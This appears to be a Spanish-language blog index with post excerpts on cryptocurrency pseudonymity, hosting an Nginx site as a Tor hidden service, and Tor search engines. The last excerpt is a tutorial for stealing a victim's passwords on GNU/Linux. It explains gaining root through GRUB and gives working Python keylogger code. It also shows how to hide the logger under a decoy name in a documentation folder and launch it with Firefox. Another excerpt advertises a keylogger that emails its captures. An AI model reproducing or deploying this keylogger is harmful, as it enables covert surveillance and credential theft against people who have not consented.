Mucha gente piensa que las criptomonedas son anónimas, pero no es así. La mayoría de ellas son pseudoanónimas, pues las transacciones se pueden rastrear y, así, descubrir quién posee la Continúa leyendo Criptomonedas, anonimato, economía descentralizada
Crear servicio oculto para sitio web en Nginx (clearnet y darknet)
¿Quieres crear un sitio web usando un servidor Nginx y quieres tener también ese sitio web como servicio oculto para usuarios de Tor? Aquí te explico cómo hacerlo en Debian GNU/Linux.
Primero instalamos los siguientes paquetes:
sudo apt install nginx tor
Luego hay que descomentar las siguientes líneas del archivo
/etc/tor/torrc
:
#HiddenServiceDir /var/lib/tor/hidden_service/
#HiddenServicePort 80 127.0.0.1:80
Yo he cambiado el nombre del directorio del servicio oculto a
servicio_oculto
, quedando así:
HiddenServiceDir /var/lib/tor/servicio_oculto/
HiddenServicePort 80 127.0.0.1:80
A continuación, reiniciamos el servicio de Tor:
sudo systemctl restart tor
Al reiniciarse Tor crea el directorio servicio_oculto/
y lo llena con
la URL del servicio oculto (archivo hostname
) y las claves pública y
privada.
Si tenemos tanto Nginx y Tor ejecutándose como servicios y nos metemos
en la dirección que hay en /var/lib/tor/servicio_oculto/hostname
,
podremos ver la página de bienvenida de Nginx.
Por defecto, el sitio web para Nginx se ha de ubicar en la ruta
/var/www/html/
. Así pues, solo tenemos que desarrollar el sitio web en
esa ubicación. No importa que se use la URL de Tor o una URL
convencional, el sitio web es el mismo. Ten en cuenta de que para que
los enlaces a otras páginas de tu sitio web funcionen usando URLs
.onion
es necesario usar URLs relativas.
Extra: añadir cabecera de .onion disponible
Continúa leyendo Crear servicio oculto para sitio web en Nginx (clearnet y darknet)Mejores buscadores para la Internet profunda de Tor (deep web)
Encontrar servicios ocultos para Tor puede ser algo complicado sin la ayuda de un buscador. Por suerte existen varios. Los enlaces a estos buscadores funcionan solo para navegadores que permiten acceder a servicios ocultos, como Tor Browser y Brave.
1. Ahmia
Este buscador es libre y tiene más de 53 000 servicios ocultos Continúa leyendo Mejores buscadores para la Internet profunda de Tor (deep web)
Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirse
En este artículo enseño como programar un keylogger avanzado que envía mensajes por correo electrónico y se autodestruye después de una fecha concreta.
Continúa leyendo Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirseRegistrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada
Una forma sencilla de robar contraseñas es instalar un registrador de teclas (keylogger) en el ordenador de la víctima. Voy a mostrar cómo hacerlo en GNU/Linux usando el lenguaje de programación Python.
Lo primero que debemos hacer es obtener permisos de superusuario. Si el equipo lo administramos nosotros, ya sabemos la contraseña. En caso contrario, podemos obtener acceso como superusuario desde GRUB. Con los permisos necesarios tenemos vía libre para instalar el keylogger.
En primer lugar, hay que instalar el módulo pynput
mediante...
sudo pip install pynput
A continuación, debemos escribir el keylogger. Este es el código que usaremos:
#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging
log_dir = "/usr/share/doc/python3/"
logging.basicConfig(filename=(log_dir + "log"), \
level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(str(key))
with Listener(on_press=on_press) as listener:
listener.join()
El registro de teclas se guarda en log_dir
. Yo, en este caso, he
especificado la carpeta de documentación de Python 3 en GNU/Linux.
El keylogger también podemos guardarlo en ese mismo
directorio, quizá con el nombre compile_docs.py
o algo
parecido para no llamar la atención. Lo ideal es elegir una carpeta a la
que la victima no vaya a entrar para evitar que se dé cuenta de lo que
estamos haciendo.
El último paso sería ejecutar el programa cada vez que se encienda el ordenador o se inicie un programa sin que la víctima se dé cuenta. Si, por ejemplo, queremos iniciar el keylogger cada vez que el usuario abra Firefox, podemos modificar el comando Firefox. Continúa leyendo Registrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada